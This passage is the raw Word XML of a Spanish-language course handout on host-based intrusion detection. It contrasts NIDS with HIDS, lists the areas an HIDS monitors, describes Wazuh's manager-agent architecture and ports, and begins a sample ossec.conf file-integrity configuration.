              <w:t>Escalabilidad</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="328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2F3C6A50" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>Un sensor cubre toda la red</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="408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2F3C6A51" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>Requiere un agente por cada host monitoreado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2F3C6A53" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="009E121D">
      <w:pPr>
        <w:spacing w:before="8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5"/>
        <w:gridCol w:w="8675"/>
      </w:tblGrid>
      <w:tr w:rsidR="009E121D" w:rsidRPr="003C1812" w14:paraId="2F3C6A59" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="7F6000"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="7F6000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="7F6000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="7F6000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="7F6000"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2F3C6A54" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>💡</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8960" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="7F6000"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="7F6000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="7F6000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="7F6000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:left w:w="180" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:right w:w="180" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2F3C6A55" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="80"/>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="7F6000"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>ANALOGÍA — El NIDS ve el sobre. El HIDS lee la carta.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6A56" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>El NIDS es el guardia del edificio que ve quién entra y sale — puede describir a la persona, qué ropa lleva y a qué hora llegó. Pero si el visitante lleva una carta cifrada, el guardia no puede leer el contenido.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6A57" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>El HIDS es la persona dentro del edificio que ya recibió la carta, la descifró y puede leer exactamente qué dice. Ve el contenido real, no el sobre.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6A58" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>En términos técnicos: cuando un payload llega cifrado por TLS al servidor web, el NIDS ve paquetes cifrados. El HIDS en ese servidor ve el payload ya descifrado por el SO — exactamente lo que hace el atacante con el contenido.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2F3C6A5A" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="009E121D">
      <w:pPr>
        <w:spacing w:before="80"/>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F3C6A5B" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.2 Qué monitorea un HIDS concretamente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121D" w:rsidRPr="003C1812" w14:paraId="2F3C6A63" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="2E74B5"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="2E74B5"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="2E74B5"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="2E74B5"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EBF3FB"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:left w:w="180" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:right w:w="180" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2F3C6A5C" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="80"/>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F4E79"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>Las seis áreas de monitoreo de un HIDS moderno</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6A5D" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>File Integrity Monitoring (FIM) — detecta cualquier cambio en archivos configurados como críticos: /etc/passwd, /etc/sudoers, binarios del sistema, archivos de configuración. Usa hashing (MD5, SHA-256) para comparar el estado actual con la línea base.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6A5E" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>Monitoreo de procesos — detecta procesos nuevos, procesos que se ejecutan con privilegios inesperados, o procesos que abren conexiones de red inusuales.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6A5F" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>Monitoreo de logs del SO — analiza /var/log/auth.log, /var/log/syslog, Windows Event Log, y otros logs del sistema en busca de patrones anómalos.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6A60" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>Monitoreo de usuarios y autenticación — detecta intentos de login fallidos, creación de nuevos usuarios, cambios de contraseña, accesos en horarios inusuales.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6A61" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>Monitoreo de red del host — ve qué conexiones abre cada proceso individualmente — algo que el NIDS no puede hacer porque no puede asociar tráfico de red con procesos específicos.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6A62" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>Compliance y configuración — verifica que la configuración del sistema cumple con marcos como CIS Benchmark, NIST o PCI DSS.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2F3C6A64" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="009E121D">
      <w:pPr>
        <w:spacing w:before="120"/>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F3C6A65" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C1812">
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>4. Wazuh — SIEM y HIDS en una sola plataforma</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3C6A66" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C1812">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>Wazuh es una plataforma open source que combina HIDS y SIEM en un solo sistema. Es gratuita, activamente mantenida, usada en producción por miles de organizaciones, y es exactamente la herramienta que usarás en el laboratorio de esta sesión. Fue lanzada en 2015 como fork de OSSEC y ha crecido hasta convertirse en uno de los SIEMs open source más completos disponibles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3C6A67" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="009E121D">
      <w:pPr>
        <w:spacing w:before="80"/>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F3C6A68" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C1812">
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>4.1 Arquitectura Manager-Agent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3C6A69" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C1812">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Wazuh opera con un modelo centralizado de dos componentes principales que se comunican en tiempo real:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3C6A6A" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="009E121D">
      <w:pPr>
        <w:spacing w:before="6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3160"/>
        <w:gridCol w:w="2000"/>
      </w:tblGrid>
      <w:tr w:rsidR="009E121D" w14:paraId="2F3C6A6F" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>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2F3C6A6B" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Componente</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2F3C6A6C" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Dónde se instala</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="31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2F3C6A6D" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Qué hace</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2F3C6A6E" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Puerto</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E121D" w:rsidRPr="003C1812" w14:paraId="2F3C6A74"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F3C6A70" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Wazuh Manager</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F3C6A71" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>Servidor central (tu VM en el laboratorio)</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F3C6A72" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>Recibe eventos de todos los agentes, aplica reglas de correlación, genera alertas, expone el dashboard</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F3C6A73" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>1514/UDP (eventos), 1515/TCP (registro de agentes)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E121D" w:rsidRPr="003C1812" w14:paraId="2F3C6A79"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2F3C6A75" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Wazuh Agent</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2F3C6A76" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>Cada host a monitorear (VMs de los alumnos)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="31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2F3C6A77" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>Recopila logs del SO, monitorea archivos e integridad, ejecuta checks de compliance, envía todo al Manager</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2F3C6A78" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>Conexión saliente al Manager en 1514</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E121D" w14:paraId="2F3C6A7E"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F3C6A7A" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Wazuh Dashboard</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F3C6A7B" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>Incluido en el Manager (interfaz web)</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F3C6A7C" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>Visualización de alertas, búsqueda de logs, mapeo MITRE ATT&amp;CK, reportes de compliance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F3C6A7D" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>443/HTTPS (acceso del analista)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2F3C6A7F" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="009E121D">
      <w:pPr>
        <w:spacing w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F3C6A80" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C1812">
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>4.2 Las cuatro capacidades principales de Wazuh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3C6A81" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C1812">
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>4.2.1 File Integrity Monitoring (FIM)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3C6A82" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r w:rsidRPr="003C1812">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t xml:space="preserve">El módulo FIM de Wazuh (también llamado syscheck) calcula el hash de cada archivo monitoreado cuando el agente arranca, y luego verifica periódicamente si el hash ha cambiado. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Cualquier modificación no autorizada genera una alerta inmediata.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3C6A83" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="009E121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121D" w14:paraId="2F3C6A94" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="444444"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="444444"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="444444"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="444444"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
            <w:tcMar>
              <w:top w:w="140" w:type="dxa"/>
              <w:left w:w="200" w:type="dxa"/>
              <w:bottom w:w="140" w:type="dxa"/>
              <w:right w:w="200" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2F3C6A84" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="6A9955"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t># Configuración básica de FIM en ossec.conf del agente:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6A85" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>&lt;syscheck&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6A86" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  &lt;frequency&gt;300&lt;/frequency&gt;   &lt;!-- verificar cada 5 minutos --&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6A87" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  &lt;directories check_all='yes'&gt;/etc,/usr/bin,/usr/sbin&lt;/directories&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6A88" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  &lt;directories check_all='yes'&gt;/bin,/sbin&lt;/directories&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6A89" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  &lt;ignore&gt;/etc/mtab&lt;/ignore&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6A8A" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  &lt;ignore&gt;/etc/hosts.deny&lt;/ignore&gt;</w:t>
